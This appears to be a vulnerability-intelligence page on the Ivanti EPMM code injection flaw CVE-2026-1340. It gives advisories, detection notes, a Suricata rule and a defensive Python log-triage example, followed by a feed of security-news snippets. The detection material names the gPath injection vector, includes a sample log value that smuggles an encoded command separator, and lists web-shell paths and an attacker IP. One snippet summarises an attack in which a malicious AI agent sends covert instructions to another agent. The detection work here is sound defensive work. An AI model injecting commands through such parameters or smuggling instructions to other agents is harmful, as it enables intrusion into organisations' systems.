CVE-2026-1340
Published 2026-01-29
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
Priority: P1 (100), critical, CVSS 3.1 base score 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, due 2026-04-11
Exploited in the wild
EPSS: 84.04% (99.7th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ivanti | endpoint_manager_mobile | <= 12.7.0.0 | — |
Detection & IOCs (extracted from sources)
sigma (query excerpt): `filter log_type in ("https_request", "https_access", "http_request", "https_access") | alter ... HTTP_Request_URI ... Attempted_command_execution = arrayindex(regextract(_raw_log, "^(?:[^P]*P)+RODUCT=(?:[^\"]*\")(?:GET|POST|PUT)\s+(?:[^=]*=)+gPath([^\s]+)"), 0)`
- CVE-2026-1340 exploits the bash script at map-aft-store-url via HTTP GET requests to /mifs/c/aftstore/fob/ endpoints. Monitor for GET requests to this URI prefix on EPMM appliances.
- Look for the gPath parameter in HTTP request URIs in EPMM logs, which is the injection vector for command execution in both CVE-2026-1281 and CVE-2026-1340.
- 85% of exploitation payloads use OAST DNS callbacks to verify command execution (blind RCE verification). Detect outbound DNS queries from EPMM servers to unknown/random subdomains as a sign of successful exploitation.
- Dormant JSP web shells (401.jsp, 403.jsp, 1.jsp) are deployed at /mi/tomcat/webapps/mifs/. Scan for unexpected JSP files in this directory, especially those requiring a specific trigger parameter to activate.
- Attackers use sleep commands (e.g., sleep 5) as a time-based blind RCE check. A 5-second delay before a 404 response on EPMM endpoints is a strong indicator of successful RCE.
- The dominant exploitation source IP 193[.]24[.]123[.]42 (PROSPERO OOO, AS200593) is absent from widely circulated IOC lists. Block and alert on traffic from this IP and AS200593 on EPMM-facing infrastructure.
- Published IOC lists for this campaign include Windscribe VPN exit node IPs that show zero Ivanti EPMM exploitation activity; those IPs are scanning Oracle WebLogic on port 7001. Do not rely solely on circulated IOC lists for detection.
- CVE-2026-1340 and CVE-2026-1281 share the same root cause (unsafe bash script usage) but reside in two distinct scripts handling different features (map-appstore-url vs. map-aft-store-url). Patches are version-specific, not vulnerability-specific — apply the correct RPM for your EPMM version.
- Dormant web shells are designed to survive patching. Organizations should review their EPMM appliances for signs of compromise even after applying the patch, as backdoors may already be present.
- The sleeper shells at /mifs/403.jsp require a specific trigger parameter to activate and show no follow-on exploitation at time of reporting. Compromised systems may appear unaffected while the implant waits.
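The detection notes above, applied to constructed sample data as an added example. This is not code from Ivanti or from any of the sources quoted here; the access-log layout (`src_ip method uri status response_ms`), the baseline JSP file names, and the indicator names are assumptions made for the example. The `gPath`/`ret` parameter names, the `/mifs/c/aftstore/fob/` prefix, the 5-second 404 heuristic, the web-shell directory and the 193[.]24[.]123[.]42 source IP all come from the page.

```python
"""Added example (not Ivanti's or any vendor's code): apply the EPMM detection
notes on this page to constructed access-log lines and a constructed listing of
/mi/tomcat/webapps/mifs/. The log layout "src_ip method uri status response_ms"
and the baseline JSP names are assumptions made for this example."""
import re
from urllib.parse import unquote

# Parameters named on the page as the injection vector (gPath; the Suricata
# rule also matches ret). The value is captured raw and decoded afterwards so
# that URL-encoded metacharacters such as %3B or %26 survive the '&' split.
INJECT_PARAM = re.compile(r"[?&](gPath|ret)(?:\[[^\]]*\])?=([^&]*)")
SHELL_META = re.compile(r"[;$&`|]")
AFTSTORE_PREFIX = "/mifs/c/aftstore/fob/"
SLOW_404_MS = 5000                   # ~5 s delay before a 404: sleep-based RCE check
KNOWN_BAD_IPS = {"193.24.123.42"}    # refanged from the page's 193[.]24[.]123[.]42
EXPECTED_JSP = {"index.jsp", "login.jsp"}  # assumed baseline for the webapp dir
STRONG = {"gpath_shell_metachar", "slow_404_sleep_check", "known_exploitation_ip"}

# Constructed sample lines: no real payload, only a placeholder value with ';'.
SAMPLE_LOG = """\
10.0.0.5 GET /mifs/c/aftstore/fob/3/sha256:abc 200 120
193.24.123.42 GET /mifs/c/aftstore/fob/3/sha256:abc?st=theValue&gPath[x]=foo%3Bbar 404 5210
192.0.2.7 GET /mifs/login.jsp 200 30
198.51.100.4 GET /mifs/c/aftstore/fob/3/sha256:abc?gPath[x]=plain 404 45
"""
# Constructed directory listing of /mi/tomcat/webapps/mifs/.
SAMPLE_LISTING = ["WEB-INF", "index.jsp", "login.jsp", "403.jsp", "401.jsp"]


def parse_line(line):
    """Split one assumed-format access-log line into its fields."""
    src, method, uri, status, ms = line.split()
    return {"src": src, "method": method, "uri": uri,
            "status": int(status), "ms": int(ms)}


def classify(line):
    """Return the indicator names that fire for one access-log line."""
    rec = parse_line(line)
    uri = rec["uri"]
    hits = []
    # Weak indicator: any GET to the URI prefix served by the vulnerable script.
    if rec["method"] == "GET" and uri.startswith(AFTSTORE_PREFIX):
        hits.append("aftstore_fob_request")
    # Strong indicator: a gPath/ret value carrying a shell metacharacter
    # (decoded twice so double-encoded forms like %253B are caught too).
    m = INJECT_PARAM.search(uri)
    if m and SHELL_META.search(unquote(unquote(m.group(2)))):
        hits.append("gpath_shell_metachar")
    # Strong indicator: slow 404 on an EPMM endpoint (time-based blind RCE check).
    if uri.startswith("/mifs/") and rec["status"] == 404 and rec["ms"] >= SLOW_404_MS:
        hits.append("slow_404_sleep_check")
    if rec["src"] in KNOWN_BAD_IPS:
        hits.append("known_exploitation_ip")
    return hits


def unexpected_jsp(listing, baseline=EXPECTED_JSP):
    """JSP files in the webapp directory that are not in the known baseline."""
    return sorted(n for n in listing if n.lower().endswith(".jsp") and n not in baseline)


def triage(log_text):
    """Per-line hits plus the set of sources that produced a strong indicator."""
    lines = [l for l in log_text.splitlines() if l.strip()]
    per_line = [classify(l) for l in lines]
    sources = {parse_line(l)["src"] for l, hits in zip(lines, per_line) if STRONG & set(hits)}
    return {"per_line": per_line, "suspicious_sources": sources}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for hits in result["per_line"]:
        print(hits)
    print("suspicious sources:", result["suspicious_sources"])
    print("unexpected JSP files:", unexpected_jsp(SAMPLE_LISTING))
```

The prefix match alone is deliberately kept as a weak indicator: legitimate clients also reach `/mifs/c/aftstore/fob/`, so only the metacharacter, slow-404 and known-IP checks promote a source to the suspicious set. The directory check is the post-patch step the notes call for, since the listed shells are designed to survive the RPM update.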
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | | 9.8 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
GHSA
GHSA-wv3p-w5rj-f5p6: A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution
ghsa_unreviewed · 2026-01-30 · CVE-2026-1340 [CRITICAL] CWE-94
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
VulnCheck
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
vulncheck · 2026 · CVSS 9.8 · CVE-2026-1340 [CRITICAL] CWE-94
Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability that could allow attackers to achieve unauthenticated remote code execution.
Affected: Ivanti Endpoint Manager Mobile (EPMM)
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://tracker.crowdsec.net/cves/CVE-2026-1340; https://defusedcyber.com/ivanti-epmm-sleeper-shells-403jsp; https://www.greynoise.io/blog/active-ivanti-exploitation; https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/; https://www.recordedfuture.com/blog/january-2026-cve-landscape; https://github
VulnCheck
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
vulncheck · 2026 · CVSS 9.8 · CVE-2026-1281 [CRITICAL] CWE-94
Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability that could allow attackers to achieve unauthenticated remote code execution.
Affected: Ivanti Endpoint Manager Mobile (EPMM)
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-01-31&host_type=
CISA
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
cisa · 2026-04-08 · CVSS 9.8 · CVE-2026-1340 [CRITICAL] CWE-94
Vulnerability: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
Affected: Ivanti Endpoint Manager Mobile (EPMM)
Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability that could allow attackers to achieve unauthenticated remote code execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: Please adhere to Ivanti's guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please see: https://hub.ivanti.com/s/a
Ivanti
Ivanti Security Advisory: CVE-2026-1340
vendor_ivanti · 2026-01-29 · CVSS 9.8 · CVE-2026-1340 [CRITICAL] CWE-94
A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve unauthenticated remote code execution.
CVE IDs: CVE-2026-1340
CVSS Base Score: 9.8
Severity: CRITICAL
CWEs: CWE-94
CISA
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
cisa · 2026-01-29 · CVSS 9.8 · CVE-2026-1281 [CRITICAL] CWE-94
Vulnerability: Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
Affected: Ivanti Endpoint Manager Mobile (EPMM)
Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability that could allow attackers to achieve unauthenticated remote code execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: Please adhere to Ivanti's guidelines to assess exposure and mitigate risks. Check for signs of potential compromise on all internet accessible Ivanti products affected by this vulnerability. Apply any final mitigations provided by the vendor as soon as possible. For more information please see: https://forums.ivanti.com
Suricata
ET WEB_SPECIFIC_APPS Ivanti Endpoint Manager Mobile Unauthenticated Remote Code Execution (CVE-2026-1281 & CVE-2026-1340)
suricata · 2026-01-30 · CVSS 9.8 · CVE-2026-1281 [CRITICAL]
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Ivanti Endpoint Manager Mobile Unauthenticated Remote Code Execution (CVE-2026-1281 & CVE-2026-1340)"; flow:established,to_server; http.uri; content:"/mifs/c/"; startswith; content:"/fob/3/"; distance:0; content:"sha256|3a|"; distance:0; content:"st|3d|theValue"; fast_pattern; distance:0; content:"h|3d|"; pcre:"/^(?:gPath|ret)(?:\x5b|\x25(?:25)?5[bB])(?:(?!\x25(?:25)?5[dD]|\x5d).)+(?:[\x3b\x24\x26\x60\x7c]|\x25(?:3[bB]|2[46]|60|7[cC]))/R"; reference:url,labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/; reference:cve,2026-1281; ref
Bleepingcomputer
## CISA gives feds four days to patch Ivanti flaw exploited as zero-day
blogs_bleepingcomputer · 2026-05-08 · CVSS 9.8 · CVE-2026-6973 [CRITICAL]
Sergiu Gatlan
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given U.S. federal agencies four days to secure their networks against a high-severity vulnerability in Ivanti Endpoint Manager Mobile (EPMM) that has been exploited in zero-day attacks.
Tracked as CVE-2026-6973, this security flaw allows attackers with administrative privileges to execute arbitrary code remotely on systems running EPMM 12.8.0.0 and earlier.
In a Thursday security advisory, Ivanti told customers they can secure their appliances by installing Ivanti EPMM 12.6.1.1, 12.7.0.1, and 12.8.0.1, and advised them to review accounts with Admin rights and rotate those credentials where necessary.
"At the time of disclosure,
Bleepingcomputer
## Ivanti warns of new EPMM flaw exploited in zero-day attacks
blogs_bleepingcomputer · 2026-05-07 · CVSS 8.8 · CVE-2026-6973 [HIGH]
Sergiu Gatlan
Ivanti warned customers today to patch a high-severity remote code execution vulnerability in Endpoint Manager Mobile (EPMM) exploited in zero-day attacks.
The security flaw (tracked as CVE-2026-6973) stems from an Improper Input Validation weakness that allows remote attackers with administrative privileges to execute arbitrary code on targeted systems running EPMM 12.8.0.0 and earlier.
Ivanti says customers can mitigate the zero-day by installing Ivanti EPMM 12.6.1.1, 12.7.0.1, and 12.8.0.1, and advises customers to review accounts with Admin rights and rotate those credentials where necessary.
"At the time of disclosure, we are aware of very limited exploitation of CVE-2026-6973, which requires admin au
Unit42
## Threat Brief: Exploitation of PAN-OS Captive Portal Zero-Day for Unauthenticated Remote Code Execution
blogs_unit42 · 2026-05-07 · CVSS 9.3 · CVE-2026-0300 [CRITICAL]
Justin Moore, Unit 42
Published: May 6, 2026
Tags: High Profile Threats, Vulnerabilities, CVE-2026-0300, EarthWorm, PAN-OS, Remote Code Execution, ReverseSocks5, Vulnerability, Zero-day
## Executive Summary
On May 6, 2026, Palo Alto Networks released a security advisory for CVE-2026-0300, identifying a buffer overflow vulnerability in the User-ID™ Authentication Portal (aka Captive Portal) service of Palo Alto Networks PAN-OS software. Vulnerable systems allow an unauthenticated attacker to execute arbitrary code with root privileges on the PA-Series and VM-Series firewalls by sending specially crafted packets.
We are aware of only limited exploitation of CVE-2026-0300 at this time
Hackernews
## Ivanti EPMM CVE-2026-6973 RCE Under Active Exploitation Grants Admin-Level Access
blogs_hackernews · 2026-05-07 · CVSS 9.8 · CVE-2026-6973 [CRITICAL]
Ivanti is warning that a new security flaw impacting Endpoint Manager Mobile (EPMM) has been exploited in limited attacks in the wild.
The high-severity vulnerability, CVE-2026-6973 (CVSS score: 7.2), is a case of improper input validation affecting EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1.
It allows "a remotely authenticated user with administrative access to achieve remote code execution," Ivanti said in an advisory released today.
"We are aware of a very limited number of customers exploited with CVE-2026-6973. Successful explo
Unit42
## Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years
blogs_unit42 · 2026-05-05 · CVSS 7.8 · CVE-2026-31431 [HIGH]
Justin Moore
Published: May 5, 2026
Tags: High Profile Threats, Vulnerabilities, Containers, CVE-2026-31431, Kubernetes, Linux, Local privilege escalation, Page cache, Vulnerability
## Executive Summary
On April 29, 2026, researchers publicly disclosed a highly reliable local privilege escalation (LPE) vulnerability tracked as CVE-2026-31431. This vulnerability is commonly referred to as Copy Fail. Discovered in about an hour through an AI-assisted process, this logic flaw allows an unprivileged local attacker to consistently escalate their access to root across virtually all major Linux distributions released since 2017.
Unlike many kernel vulnerabilities, this logic flaw is deterministic, meaning it does
Unit42
## A Deep Dive Into Attempted Exploitation of CVE-2023-33538
blogs_unit42 · 2026-04-16 · CVSS 8.8 · CVE-2023-33538 [HIGH]
Asher Davila, Malav Vyas, Chris Navarrete
Published: April 16, 2026
Tags: Threat Research, Vulnerabilities, Botnet, Command injection, CVE-2023-33538, Mirai, WiFi routers
## Executive Summary
We identified active, automated scans and probes attempting to exploit CVE-2023-33538, a vulnerability in several end-of-life TP-Link Wi-Fi router models:
- TL-WR940N v2 and v4
- TL-WR740N v1 and v2
- TL-WR841N v8 and v10
The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices.
We observed this activity after the Cybersecurity and Infrastructure Security Agency’s (CISA) June 2025 addition of this CVE (Common Vulnerabilities and Exposu
Checkpoint
## 13th April – Threat Intelligence Report
blogs_checkpoint · 2026-04-13 · CVE-2026-1340
For the latest discoveries in cyber research for the week of 13th April, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The Los Angeles Police Department has reported a data breach involving a digital storage system used by the L.A. City Attorney’s Office. The exposure included 7.7 terabytes and more than 337,000 files, including personnel records, internal affairs material, and unredacted personal information.
ChipSoft, a Dutch healthcare sof
Bleepingcomputer
## CISA orders feds to patch exploited Ivanti EPMM flaw by Sunday
blogs_bleepingcomputer · 2026-04-08 · CVSS 9.8 · CVE-2026-1340 [CRITICAL]
Sergiu Gatlan
CISA has given U.S. government agencies four days to secure their systems against a critical-severity vulnerability in Ivanti Endpoint Manager Mobile (EPMM) that has been exploited in attacks since January.
Tracked as CVE-2026-1340, this critical-severity code injection flaw enables threat actors without privileges to gain remote code execution on Internet-exposed and unpatched EPMM appliances.
Ivanti flagged this and a second security bug (CVE-2026-1281) as abused in zero-day attacks when it released security updates on January 29 to patch both vulnerabilities and "strongly" encouraged all customers to update their systems to block ongoing exploitation.
"Successful exploitation could lead to unauthent
Recorded Future
## January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day
blogs_recorded_future · 2026-02-24 · CVSS 7.8 · [HIGH]
January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.
What security teams need to know:
- APT28's Operation Neusploit: Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants
- Microsoft and SmarterTools lead concerns: These vendors accounted
Unit42
## VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)
blogs_unit42 · 2026-02-19 · CVSS 9.9 · CVE-2026-1731 [CRITICAL]
Justin Moore
Published: February 19, 2026
Tags: High Profile Threats, Vulnerabilities, Bash, CVE-2026-1731, PowerShell, Remote Access Trojan, Remote Code Execution, SparkRAT, VShell
## Executive Summary
On Feb. 6, 2026, BeyondTrust released a security advisory regarding CVE-2026-1731. BeyondTrust is an identity and access management platform. This specific vulnerability involves a pre-authentication remote code execution (RCE) issue within BeyondTrust remote support software. It could allow attackers to execute operating system commands in the context of the site user, which may lead to system compromise, including unauthor
Unit42
## Critical Vulnerabilities in Ivanti EPMM Exploited
blogs_unit42 · 2026-02-17 · CVSS 9.8 · CVE-2026-1281 [CRITICAL]
Justin Moore
Published: February 17, 2026
Tags: High Profile Threats, Vulnerabilities, CVE-2026-1281, CVE-2026-1340, Ivanti, Remote Code Execution, Reverse shells
## Executive Summary
Two critical zero-day vulnerabilities (CVE-2026-1281 and CVE-2026-1340) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, affecting enterprise mobile fleets and corporate networks. These vulnerabilities allow unauthenticated attackers to remotely execute arbitrary code on target servers, granting them full control over mobile device management (MDM) infrastructure without requiring user interaction or credentials.
Unit 42 has observed widespread exploitation of these vulnerabilities, including:
- Establishing a reverse shell
- Installing web shells
- Conducting reconnaissance
- Downloading malware
This campaign also affected the following sectors in the United States, Germany, Australia and Canada:
- State and local governme
Bleepingcomputer
## One threat actor responsible for 83% of recent Ivanti RCE attacks
blogs_bleepingcomputer · 2026-02-14 · CVSS 9.8 · CVE-2026-1286 [CRITICAL]
Bill Toulas
Update: The article initially listed the wrong CVEs. This has now been corrected to list the CVEs: CVE-2026-1286 and CVE-2026-1340
Threat intelligence observations show that a single threat actor is responsible for most of the active exploitation of two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340.
The security issues have been flagged as actively exploited in zero-day attacks in Ivanti's security advisory, where the company also announced hotfixes.
Both flaws received a critical severity rating and allow an attacker to inject code without authentication, leading to remote code execution (RCE) on vulnerable systems.
A single IP address h
Greynoiseio
Active Ivanti Exploitation Traced to Single Bulletproof IP—Published IOC Lists Point Elsewhere
blogs_greynoiseio · 2026-02-10
Checkpoint
## 9th February – Threat Intelligence Report
blogs_checkpoint · 2026-02-09 · CVE-2026-1281
For the latest discoveries in cyber research for the week of 9th February, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Romania’s national oil pipeline operator, Conpet, has suffered a cyberattack that disrupted its IT systems and took its website offline. The company said operational technology, including pipeline control and telecommunications systems, remained fully functional and oil transport continued without interruption. The attack
Bleepingcomputer
## European Commission discloses breach that exposed staff data
blogs_bleepingcomputer · 2026-02-09
Sergiu Gatlan
The European Commission is investigating a breach after finding evidence that its mobile device management platform was hacked. The Commission said on Friday that it detected traces of a cyberattack targeting infrastructure that manages its staff's mobile devices.
While the attackers may have accessed some staff members' personal information, including names and phone numbers, the Commission has not yet found evidence that their mobile devices were compromised.
"On 30 January, the European Commission's central infrastructure managing mobile devices identified traces of a cyber-attack, which may have resulted in access to staff names and mobile numbers of some of its staff members," it said.
"The Commissi
Tenable
CVE-2026-1281, CVE-2026-1340: Ivanti Endpoint Manager Mobile (EPMM) Zero-Day Vulnerabilities Exploited
blogs_tenable · 2026-01-30 · CVSS 9.8 · [CRITICAL]
Unit42
## Privileged File System Vulnerability Present in a SCADA System
blogs_unit42 · 2026-01-30 · CVSS 6.5 · CVE-2025-0921 [MEDIUM]
Asher Davila, Malav Vyas
Published: January 30, 2026
Tags: Threat Research, Vulnerabilities, CVE-2025-0921, Privilege escalation, SCADA
## Executive Summary
This report details a vulnerability we found in the Iconics Suite, tracked as CVE-2025-0921 with a Medium CVSS score of 6.5. Iconics Suite is the name of a supervisory control and data acquisition (SCADA) system. This system is used for controlling and monitoring industrial processes in different industries including automotive, energy and manufacturing.
In early 2024 we conducted an assessment of Iconics Suite and identified five vulnerabilities. These were for Microsoft Windows versions 10.97.2 and earlier.
Bleepingcomputer
## Ivanti warns of two EPMM flaws exploited in zero-day attacks
blogs_bleepingcomputer · 2026-01-29 · CVSS 9.8 · CVE-2026-1281 [CRITICAL]
Lawrence Abrams
Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were exploited in zero-day attacks.
The flaws are code-injection vulnerabilities that allow remote attackers to execute arbitrary code on vulnerable devices without authentication. Both vulnerabilities have a CVSS score of 9.8 and are rated as critical.
"We are aware of a very limited number of customers whose solution has been exploited at the time of disclosure," warns Ivanti.
Ivanti has released RPM scripts to mitigate the vulnerabilities for affected EPMM versions:
- Use RPM 12.x.0.x for EPMM versions 12.5.0.x, 12.6.0.x, and 12.7.0.x
- Use RPM 12.x.1.x for EPMM
Unit42
## Remote Code Execution With Modern AI/ML Formats and Libraries
blogs_unit42 · 2026-01-13 · CVSS 7.8 · CVE-2025-23304 [HIGH]
Curtis Carmony
Published: January 13, 2026
Tags: Threat Research, Vulnerabilities, Apple, CVE-2025-23304, CVE-2026-22584, NVIDIA, Python, PyTorch, Salesforce
## Executive Summary
We identified vulnerabilities in three open-source artificial intelligence/machine learning (AI/ML) Python libraries published by Apple, Salesforce and NVIDIA on their GitHub repositories. Vulnerable versions of these libraries allow for remote code execution (RCE) when a model file with malicious metadata is loaded.
Specifically, these libraries are:
- NeMo: A PyTorch-based framework created for research purposes that is designed for the development of diverse AI/ML models and complex sys
Unit42
## Threat Brief: MongoDB Vulnerability (CVE-2025-14847)
blogs_unit42 · 2026-01-13 · CVSS 8.7 · CVE-2025-14847 [HIGH]
Justin Moore
Published: January 13, 2026
Tags: High Profile Threats, Vulnerabilities, CVE-2025-14847, MongoDB
## Executive Summary
On Dec. 19, 2025, MongoDB publicly disclosed MongoBleed, a security vulnerability (CVE-2025-14847) that allows unauthenticated attackers to leak sensitive heap memory by exploiting a trust issue in how MongoDB Server handles zlib-compressed network messages. This flaw occurs prior to authentication, meaning an attacker only needs network access to the database's default port to trigger it.
Key details of the threat are summarized below:
- Vulnerability: CVE-2025-14847 is a critical, unauthenticated memory disclosure vulnerability in Mong
Unit42
## Exploitation of Critical Vulnerability in React Server Components (Updated December 12)
blogs_unit42 · 2025-12-12 · CVSS 10.0 · CVE-2025-55182 [CRITICAL]
Justin Moore
Published: December 12, 2025
Tags: High Profile Threats, Vulnerabilities, Cobalt Strike, CVE-2025-55182, CVE-2025-66478, Remote Code Execution, Web shells
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Jan. 30, 2025. Please refer to Vercel's website for the latest information.
## Update Dec. 12, 2025
Unit 42 uncovered the previously unseen KSwapDoor. This Linux backdoor was initially mistaken for BPFDoor.
Key features include:
- P2P mesh network: Enables multi-hop routing for robust C2 communications
- Strong encryption: Uses AES-256-CFB with Diffie-Hellman key exchange
- Stealth an
Unit42
## You Thought It Was Over? Authentication Coercion Keeps Evolving
blogs_unit42 · 2025-11-11
Bar Maor, Hila Cohen
Published: November 10, 2025
Tags: Threat Research, Vulnerabilities, Mimikatz, PrintNightmare, Privilege escalation, Windows
## Executive Summary
Imagine a scenario where malicious actors don’t need to trick you into giving up your password. They have no need to perform sophisticated social engineering attacks or exploit vulnerabilities in your operating system. Instead, they can simply force your computer to authenticate to an attacker-controlled system, effectively commanding your machine to hand over valuable credentials. This attack method is called authentication coercion.
While authentication coercion attacks such as PrintNightmare beca
## LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices
blogs_unit42 · 2025-11-07 · CVSS 8.8 · CVE-2025-21042 [HIGH]
Unit 42
Published: November 7, 2025
Threat Research
Vulnerabilities
Android
Apple
CVE-2025-21042
CVE-2025-21043
CVE-2025-43300
CVE-2025-55177
Samsung
## Executive Summary
Unit 42 researchers have uncovered a previously unknown Android spyware family, which we have named LANDFALL. To deliver the spyware, attackers exploited a zero-day vulnerability (CVE-2025-21042) in Samsung’s Android image processing library. The specific flaw LANDFALL exploited, CVE-2025-21042, is not an isolated case but rather part of a broader pattern of similar issues found on multiple mobile platforms.
This vulnerability was actively exploited in the
## Microsoft WSUS Remote Code Execution (CVE-2025-59287) Actively Exploited in the Wild (Updated November 3)
blogs_unit42 · 2025-11-03 · CVSS 9.8 · CVE-2025-59287 [CRITICAL]
Justin Moore
Published: November 3, 2025
High Profile Threats
Vulnerabilities
CVE-2025-59287
Microsoft
Microsoft Vulnerability
Remote Code Execution
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Jan. 30, 2026. Please refer to Microsoft’s website for the latest information.
On Oct. 14, 2025, a critical, unauthenticated remote code execution (RCE) vulnerability was identified in Microsoft's Windows Server Update Services (WSUS), a core enterprise component for patch management. Microsoft's initial patch during the October Patch Tuesday did not fully address the flaw, n
## When AI Agents Go Rogue: Agent Session Smuggling Attack in A2A Systems
blogs_unit42 · 2025-10-31
Jay Chen
Royce Lu
Published: October 31, 2025
Threat Research
Vulnerabilities
GenAI
Google
LLM
## Executive Summary
We discovered a new attack technique, which we call agent session smuggling. This technique allows a malicious AI agent to exploit an established cross-agent communication session to send covert instructions to a victim agent.
Here, we discuss the issues that can arise in a communication session using the Agent2Agent (A2A) protocol, which is a popular option for managing the connections between agents. The A2A protocol’s stateful behavior lets agents remember recent interactions and maintain coherent conversations. This attack expl
## Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities
blogs_unit42 · 2025-10-16 · CVSS 8.5 · CVE-2025-53868 [HIGH]
Justin Moore
Published: October 16, 2025
High Profile Threats
Vulnerabilities
CVE-2025-53868
CVE-2025-57780
CVE-2025-61955
Exfiltration
## Executive Summary
On Oct. 15, 2025, F5 — a U.S. technology company — disclosed that a nation-state threat actor conducted a significant long-term compromise of their corporate networks. In this incident, attackers stole source code from their BIG-IP suite of products and information about undisclosed vulnerabilities. F5’s BIG-IP suite is commonly used by large organizations, primarily in the U.S. but also globally, for availability, access control and security. Organizations including gove
## TOTOLINK X6000R: Three New Vulnerabilities Uncovered
blogs_unit42 · 2025-10-01 · CVSS 7.0 · CVE-2025-52905 [HIGH]
Zhibin Zhang
Published: October 1, 2025
Threat Research
Vulnerabilities
CVE-2025-52905
CVE-2025-52906
CVE-2025-52907
IoT Vulnerability
Remote Code Execution
## Executive Summary
We have uncovered three vulnerabilities in the firmware of the TOTOLINK X6000R router, version V9.4.0cu.1360_B20241207, released on March 28, 2025:
| CVE | Rating | Score | Description |
|---|---|---|---|
| CVE-2025-52905 | High | CVSS-B 7.0 | An argument injection flaw that attackers can use to trigger a denial of service (DoS), crashing the router or overwhelming remote servers. |
| CVE-2025-52906 | Critical | CVSS-B 9.3 | An unauthenticated command injection vulnerability that allows attackers to remotely execute arbit |
## Threat Brief: Salesloft Drift Integration Used To Compromise Salesforce Instances
blogs_unit42 · 2025-09-02
Unit 42
Published: September 2, 2025
High Profile Threats
Vulnerabilities
Credential-based attacks
Data exfiltration
Salesforce
Salesloft
## Executive Summary
Unit 42 stopped monitoring this threat and updating the brief on Dec. 2, 2025. Please refer to the Salesloft website for the latest information.
Unit 42 has observed activity consistent with a specific threat actor campaign leveraging the Salesloft Drift integration to compromise customer Salesforce instances. This brief provides information about our observations and guidance for potentially affected organizations.
As detailed in a recent notification from Salesloft, fro
## Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
blogs_unit42 · 2025-08-21 · CVSS 9.8 · CVE-2024-36401 [CRITICAL]
Zhibin Zhang
Yiheng An
Chao Lei
Haozhe Zhang
Published: August 21, 2025
Threat Research
Vulnerabilities
CVE-2024-36401
## Executive Summary
